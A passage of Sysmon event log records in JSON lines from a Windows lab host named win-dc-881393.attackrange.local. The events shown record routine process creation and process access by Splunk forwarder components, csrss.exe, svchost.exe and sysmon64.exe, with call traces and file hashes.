Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.469","SourceProcessGUID":"{A837DB8D-01D2-5F25-0000-00103D1F0400}","SourceProcessId":"3836","SourceThreadId":"4080","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2355,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.989\r\nProcessGuid: {A837DB8D-01D2-5F25-0000-0010F7220400}\r\nProcessId: 3928\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nFileVersion: 8.0.2\r\nDescription: Monitor windows event logs\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winevtlog.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.989","ProcessGuid":"{A837DB8D-01D2-5F25-0000-0010F7220400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","FileVersion":"8.0.2","Description":"Monitor windows event logs","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winevtlog.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2356,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:59.172\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01D2-5F25-0000-0010F7220400}\r\nTargetProcessId: 3928\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:59.172","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01D2-5F25-0000-0010F7220400}","TargetProcessId":"3928","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2357,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:59.172\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01D2-5F25-0000-0010F7220400}\r\nTargetProcessId: 3928\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:59.172","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01D2-5F25-0000-0010F7220400}","TargetProcessId":"3928","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2358,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:59.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:59.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2359,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:59.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:59.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2360,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:59.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:59.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2361,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:59.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:59.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2362,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:59.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:59.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\